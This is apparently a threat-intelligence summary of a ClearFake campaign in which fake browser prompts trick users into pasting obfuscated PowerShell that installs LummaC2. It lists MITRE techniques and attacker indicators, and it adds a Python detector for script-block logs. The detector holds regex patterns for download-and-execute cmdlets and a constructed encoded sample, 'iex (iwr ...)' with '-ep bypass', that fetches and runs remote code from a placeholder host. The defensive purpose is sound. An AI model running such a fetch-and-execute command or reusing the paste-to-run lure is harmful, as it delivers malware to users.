ReliaQuest documents a new ClearFake campaign that tricks users into manually copying and executing malicious PowerShell code to install LummaC2. The technique relies on social engineering via fake browser updates and root-certificate prompts to bypass detections, with a multi-stage PowerShell payload and DLL sideloading. #ClearFake #LummaC2 #PowerShell #DriveByDownloads #baqebei1online #cdnforfilesxyz #d1x9q8w2e4xyz
Key points
- ReliaQuest observed new ClearFake execution techniques that coax users into manually copying and running malicious PowerShell code.
- The PowerShell payload clears DNS cache, shows a message box, downloads additional PowerShell code, and ultimately installs LummaC2.
- This user-driven execution can bypass some detections and signatures because the code is run directly by the user rather than via a downloaded script.
- The campaign employs fake browser update prompts and a root-certificate prompt on compromised sites as social-engineering lures.
- ReliaQuest recommends blocking IoCs, limiting PowerShell use to required personnel, and educating users about this evolving method.
- Two case studies show different infection chains and how controls or user education could have prevented or mitigated the campaigns.
- Additional mitigations include WDAC/AMSI integration, domain-blocking policies, and tightening PowerShell execution policies.
MITRE Techniques
- [T1189] Drive-by Compromise – Adversary uses compromised websites hosting a fake browser error prompt to trick users into installing a root certificate. Quote: “On May 26, 2024, we first identified attacks on our customer base that began with users visiting a compromised website hosting a fake browser error prompt that asks the user to install a root certificate to fix the issue.”
- [T1204] User Execution – The adversary tricks users into manually copying and executing malicious PowerShell code. Quote: “The adversary tricks users into manually copying and executing malicious code in PowerShell.”
- [T1059.001] PowerShell – The attack flow guides the user to open a PowerShell terminal and paste the code, which then automatically executes. Quote: “Next, the user is guided through several steps to open a PowerShell terminal and paste in the code, which then automatically executes.”
- [T1027] Obfuscated/Compressed Files and Information – PowerShell code copied by the user was obfuscated using base64 encoding. Quote: “PowerShell code copied by the user was obfuscated using base64 encoding.”
- [T1105] Ingress Tool Transfer – The campaign downloads further PowerShell code and subsequent payloads (including a ZIP with MediaInfo components). Quote: “downloading further PowerShell code” and “The ZIP file contains the legitimate ‘MediaInfo.exe’ file and the malicious DLL ‘MediaInfo_i386.dll’.”
- [T1574.001] DLL Side-Loading – The PowerShell script executes MediaInfo.exe and the malicious DLL via DLL sideloading. Quote: “which subsequently executes MediaInfo.exe and the malicious DLL via DLL sideloading.”
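Because the user pastes the code themselves, the most reliable defender-side telemetry is PowerShell script-block logging (Event ID 4104). The following is an added example, not code from ReliaQuest or the report, that unwraps the base64 layer described under T1027 and flags an entry only when the stages of the chain in the key points (DNS cache flush, message box, download of further PowerShell) co-occur; the sample script-block texts and the `example.invalid` host are constructed for the demonstration.

```python
import base64
import binascii
import re

# Indicator categories taken from the chain the report describes: flush the
# DNS cache, show a message box, then fetch and run further PowerShell.
INDICATORS = {
    "dns_flush": re.compile(r"Clear-DnsClientCache|ipconfig(?:\.exe)?\s+/flushdns", re.I),
    "message_box": re.compile(r"System\.Windows\.Forms\.MessageBox|MessageBox\]::Show|\bmsgbox\b", re.I),
    "download": re.compile(r"Invoke-WebRequest|Invoke-RestMethod|DownloadString|Net\.WebClient|\biwr\b|\birm\b", re.I),
    "invoke": re.compile(r"Invoke-Expression|\biex\b", re.I),
}
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

def expand_base64_layers(text: str) -> str:
    """Append the decoded form of every long base64 run so indicators hidden
    behind one encoding layer (as in the pasted code) are visible to the regexes."""
    expanded = text
    for blob in B64_RUN.findall(text):
        try:
            raw = base64.b64decode(blob, validate=True)
        except binascii.Error:
            continue
        # -EncodedCommand payloads are UTF-16LE; plain scripts may be UTF-8.
        for codec in ("utf-16le", "utf-8"):
            try:
                expanded += "\n" + raw.decode(codec)
            except UnicodeDecodeError:
                pass
    return expanded

def score_script_block(text: str) -> dict:
    """Report which indicator categories a script-block log entry matches.
    A lone DNS flush is normal admin activity, so the entry is only flagged
    when three or more categories co-occur, as they do in the reported chain."""
    expanded = expand_base64_layers(text)
    hits = {name: bool(rx.search(expanded)) for name, rx in INDICATORS.items()}
    hits["suspicious"] = sum(hits.values()) >= 3
    return hits

# Constructed sample Event ID 4104 script-block texts (not taken from the report).
BENIGN_BLOCK = "Get-ChildItem C:\\Temp | Remove-Item -Recurse -Force"
LONE_FLUSH_BLOCK = "Clear-DnsClientCache; Write-Host 'done'"
_STAGE1 = ("Clear-DnsClientCache; [System.Windows.Forms.MessageBox]::Show('Update applied'); "
           "iex (iwr 'https://stage2.example.invalid/u.ps1' -UseBasicParsing)")  # placeholder host
# Encoded the way -EncodedCommand expects, mimicking the base64 layer the user pastes.
ENCODED_BLOCK = "powershell -ep bypass -enc " + base64.b64encode(_STAGE1.encode("utf-16le")).decode()
```

Feed `score_script_block` the ScriptBlockText field of each 4104 event; only the encoded chain is flagged, while the lone cache flush and the cleanup one-liner are not.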
Indicators of Compromise
- [Hash] context – a467302da10ace0bf96963bcd6bdcd6a4e619e28cd477612988276dfee9f429e, 4d417cff26e83e096f6c161a10d6a72774b8bbc8948bf5b6d3156e6f17adac5f, and 2 more hashes
- [Attacker-Controlled Domains] context – baqebei1.online, cdnforfiles.xyz, and 1 more domain
- [Attacker-Controlled IP Addresses] context – 104.21.29.92, 172.67.148.183, and 1 more IP
- [Infected Websites] context – lambhuaexpress.in, soundmine.me, and other compromised sites (9 more listed in article)
Read more: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/